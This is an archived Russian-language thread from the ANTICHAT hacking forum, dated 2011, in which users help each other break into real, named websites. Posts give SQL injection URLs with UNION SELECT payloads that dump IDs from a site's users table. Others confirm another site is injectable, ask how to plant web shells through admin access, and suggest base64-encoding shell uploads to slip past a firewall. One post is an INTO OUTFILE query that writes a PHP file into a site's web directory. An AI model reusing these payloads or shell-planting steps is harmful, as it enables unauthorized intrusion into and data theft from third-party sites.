ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.10.2011, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
10263
Репутация:
0
|
|
Сообщение от Boolean
Boolean said:
Ну если их там нет, то откуда им взяться?
Записи с id 1, 2,3 и т.п. вполне могли быть удалены.
Да нет они там есть. я знаю точно. сейчас обосную.
При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22....
пример
--ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4 ,5+from+goldsauna.users+ORDER+BY+id+ASC+--+
а при двойном запросе с добавлением name например,
выводиться уже с позиции 166
|
|
|
|
30.10.2011, 20:28
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от namez2
namez2 said:
Да нет они там есть. я знаю точно. сейчас обосную.
При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22....
пример
--ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4 ,5+from+goldsauna.users+ORDER+BY+id+ASC+--+
а при двойном запросе с добавлением name например,
выводиться уже с позиции 166
а чем вас не устраивает limit?
Сообщение от None
_http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,concat_ws(0x3a,id),4,5+from+go ldsauna.users+limit+0,1+--+
и с подобными вопросами наверное лудше было бы запостить в разделе по БД а не уязвимостей.
_/thread62769.html
|
|
|
30.10.2011, 21:30
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
пытаюсь править индекс, вставляю код, нажимаю save сайт выдает
Сообщение от None
Method Not Implemented
POST to /photo/ll.php not supported.
Apache bla-bla-bla version Server at *** Port 80
что делать? есть ли шеллы использующие метод ГЕТ? |
|
|
|
30.10.2011, 21:46
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от vaddd
vaddd said:
что делать? есть ли шеллы использующие метод ГЕТ?
Не поможет. Это обычный firewall так реагирует на левые данные в REQUEST запросах.
Закодируй в base64 контент пост-запроса и запиши в файл уже раскодированный.
|
|
|
|
31.10.2011, 04:23
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Так же часто промежуточный сервер блокирует такие данные, в том числе и с большим объёмом.
А вообще WSO постоянно использует POST(Шелл не работал бы вообще), а у GET длина ограничена(Не получиться передать нужный объём).
|
|
|
|
31.10.2011, 17:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
43818
Репутация:
0
|
|
как залить шелл на ipb>3 ?
доступ в админку есть
|
|
|
|
31.10.2011, 18:58
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от crackforme
crackforme said:
как залить шелл на ipb>3 ?
доступ в админку есть
/threadnav89112-1-10.html
|
|
|
|
31.10.2011, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
_http://wero.ru/php/content.php?id=163' это sql иньекция?
|
|
|
|
31.10.2011, 22:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от DyukiN
DyukiN said:
_http://wero.ru/php/content.php?id=163' это sql иньекция?
да...
|
|
|
|
31.10.2011, 22:21
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
В чем ошибка ?
Код:
Code:
select '' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
